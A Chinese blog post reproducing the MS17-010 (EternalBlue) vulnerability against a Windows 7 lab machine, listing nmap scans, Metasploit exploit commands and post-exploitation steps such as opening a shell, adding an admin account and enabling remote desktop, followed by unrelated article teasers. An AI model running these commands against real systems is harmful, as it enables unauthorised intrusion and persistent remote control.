1. 全栈程序员必看首页

MS17010(永恒之蓝)漏洞复现

全栈程序员-站长 未分类 阅读 53

MS17010(永恒之蓝)漏洞复现MS17010(永恒之蓝)漏洞利用与复现首先需要准备win7的环境做为靶机获取信息利用nmap扫描得到,靶机IPnmap-sP192.168.229.0/24得到:IP:192.168.229.169然后利用:nmap–script=vuln192.168.229.169得到靶机信息:发现可能利用的漏洞:ms17-010然后启动msfmsfconsole然后查找漏洞路径:searchms17-010使用payload进行攻击:useexploit

大家好,又见面了,我是你们的朋友全栈君。

MS17010(永恒之蓝)漏洞利用与复现

首先需要准备win7的环境做为靶机

获取信息

利用nmap扫描得到,靶机IP

nmap -sP 192.168.229.0/24

得到:
IP:192.168.229.169
在这里插入图片描述

然后利用:

nmap --script=vuln 192.168.229.169

得到靶机信息:

在这里插入图片描述

发现可能利用的漏洞:
ms17-010

然后启动msf

msfconsole

然后查找漏洞路径:

search ms17-010

在这里插入图片描述
使用payload进行攻击:

use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.229.169
run

在这里插入图片描述
然后输入:shell

在这里插入图片描述

然后在查看当前用户:

net user

在这里插入图片描述
发现用乱码可以用这个取消乱码:

chcp 65001

然后添加一个admin用户密码也为admin

在这里插入图片描述

然后开启3389端口:

在这里插入图片描述

然后在开启远程控制:

在这里插入图片描述

得到:

在这里插入图片描述

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/132483.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长
0 0


相关推荐

  • mysql中not exists用法_not exists用法

    mysql中not exists用法_not exists用法

    mysql中not exists用法_not exists用法notexists是sql中的一个语法,常用在子查询和主查询之间,用于条件判断,根据一个条件返回一个布尔值,从而来确定下一步操作如何进行,notexists也是exists或in的对立面。notexists是exists的对立面,所以要了解notexists的用法,我们首先了解下exists、in的区别和特点:exists:强调的是是否返回结果集,不要求知道返回什么,比如:sele…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年7月15日
    13
  • silverlight开发_net网站例子

    silverlight开发_net网站例子

    silverlight开发_net网站例子http://money.finance.sina.com.cn/silverlight/Sina财经Silverlight4.0版http://vip.stock.finance.sina.com.cn/silverpulsehttp://pjd.mscui.net/default.htmhttp://www.silverlight.net 学习网站:http:/

    全栈程序员-站长的头像 全栈程序员-站长
    2022年10月10日
    2
  • cloudsim4.0中CloudSimExample2分析

    cloudsim4.0中CloudSimExample2分析

    cloudsim4.0中CloudSimExample2分析CloudSimExample2展示如何创建一个只含一个主机的数据中心,并在其上运行两个云任务。(两个云任务运行在具有相同计算能力的虚拟机上,即两个云任务的执行需要相同的时间)首先附上CloudSimExample1全部代码:/**Title:CloudSimToolkit*Description:CloudSim(CloudSimulation)…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年10月13日
    2
  • idea激活码mac【在线注册码/序列号/破解码】 idea

    idea激活码mac【在线注册码/序列号/破解码】

    idea激活码mac【在线注册码/序列号/破解码】,https://javaforall.net/100143.html。详细ieda激活码不妨到全栈程序员必看教程网一起来了解一下吧!

    全栈程序员-站长的头像 全栈程序员-站长
    2022年3月19日
    54
  • PLSQL基本操作手册

    PLSQL基本操作手册

    PLSQL基本操作手册公众号:池哥搬砖QQ1群:745460286个人WX公号:目录第1章用PLSQL连接Oracle数据库§1.2登录信息保存功能设置:§1.3进入PLSQL后切换数据库连接:第2章PLSQL中编写SQL语句并执行第3章PLSQL中查看数据库表结构§3.1查看表结构:§3.2表结构窗口和SQL编写窗口切换:第4章…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年5月2日
    36
  • javaweb-springMVC-56

    javaweb-springMVC-56

    javaweb-springMVC-56

    全栈程序员-站长的头像 全栈程序员-站长
    2021年5月18日
    125

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号